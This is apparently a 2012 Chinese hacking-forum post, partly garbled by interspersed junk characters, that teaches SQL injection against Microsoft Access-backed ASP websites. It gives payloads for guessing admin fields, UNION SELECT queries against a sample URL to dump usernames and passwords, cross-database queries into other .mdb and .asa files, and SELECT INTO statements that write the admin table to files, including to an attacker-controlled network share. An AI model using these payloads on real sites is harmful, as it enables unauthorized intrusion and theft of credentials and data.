标题: Access高级注入语句 [打印本页] 作者: admin 时间: 2012-9-15 14:20 标题: Access高级注入语句 -------------------------------------------------------------- % _0 F5 X v$ D8 A, _$ |6 ]union查询法 % l2 ~" ^, v; A5 k& m3 ^首先要说的就是查询办法,一般的查询办法就是$ F( }2 P% L) R
' `. n/ A( m Z5 ~ w9 S' Y. K! g2 w
程序代码1 m9 {: `- {/ z( `
and 1=(select count(*) from admin where left(id,1)='1') ( P5 t# k1 O; K3 `1 T3 P6 y3 }! J/ v2 A1 Y6 L7 \1 O
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.3 i- j& |$ p9 I9 p
所以这个时候,union select横空出现.别以为只能在PHP里用哦...9 S1 F4 S9 B5 C1 o- e
譬如你有一个ACCESS点: 0 \4 o' p5 m% f. u- G9 a程序代码, L/ j) \3 z) a http://bbs.tian6.com/xiaoyang.asp?coder=1 8 G& X' E, L+ ]) O7 y6 K& W$ u, i 5 h Q+ @: ~- g5 }6 I知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),0 o5 ]5 @, n( z: ?. ?' G
然后我们直接来:3 G3 _7 D$ D$ j9 p) E5 } [; r1 C
程序代码5 X- j! F& X* ~3 S' u6 z http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)] 0 w' _4 r" ]; G! g/ e 2 H: N- \' a* C4 z h这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了. + v! m( o8 ?, ~- d3 E& ~5 v 1 ?3 c( }* n& ^) h" z! v {3 g, m6 ^5 F, d3 |9 q( T
) A9 ` T4 L; \ b+ |---------------------------------------------------------------; m n( Y/ s# w( [
Access跨库查询 ' P5 M# I$ t( {* q有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.3 ?( i5 r1 L" H* p' a' O- L
跨库的查询语句: [6 C$ t; G! n0 q G) k
子查询:' ?1 g! ^9 z7 s: i5 A, \
程序代码, H8 R7 G6 z) o: U) Z( {" c! s; n: a
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0 # @5 q0 `; |& n5 y7 l# { 8 c/ K' b. E& K/ P6 f D) Kunion查询: 1 g1 H8 X/ q" r2 H* z( O程序代码 $ `1 K P4 j) {8 d5 o2 R8 Q7 L; I5 f( Iunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1" w3 b3 [; Y: Z T
# g* L) k- m' {
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接: * ?6 O; M8 q q/ N程序代码 3 x" ^# z5 \4 y2 ]http://www.4ngel.net/article/46.htm 7 x+ Q _9 B! I http://hf110.com/Article/hack/rqsl/200502/66.html0 U; S( d+ _3 ~8 x# q
5 P. b; p0 D1 A8 K1 K# L( _. Y
--------------------------------------------------------------- # `; P( j. i9 I% Y: K5 WAccess注入,导出txt,htm,html + q3 M8 m( W8 Z! V子查询语句: * d, b$ r7 ^; w) ^: l程序代码8 T! O! t* S8 M+ l
Select * into [test.txt] in 'd:\web\' 'text;' from admin3 O) d2 s) \0 V2 [
9 Y" \8 d! K' }- x `这样就把admin表的内容以test类型存进了d:\web里面.( K( W6 y4 q* {) {8 n
UNION查询: : V, v) @# @8 ]- j6 J程序代码9 d) _1 |/ e, Z1 R: z9 t
union select * into [admin.txt] in 'c:\' 'test;' from admin3 A" E3 b: c7 E9 H3 p3 I
# W F8 Z8 |1 m) _$ y而且这里也可以保存到本地来: ! [8 _+ V, ]4 R; ^9 O程序代码 # A" d3 p' J1 `- Y& r6 g4 @& a3 WSelect * into [test.txt] in '\\yourip\share' 'text;' from admin) `; |9 C) w6 A
3 e6 e) i+ u/ a
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:$ U1 H& s y( J* U4 {' X* G' f: e, Y) C6 f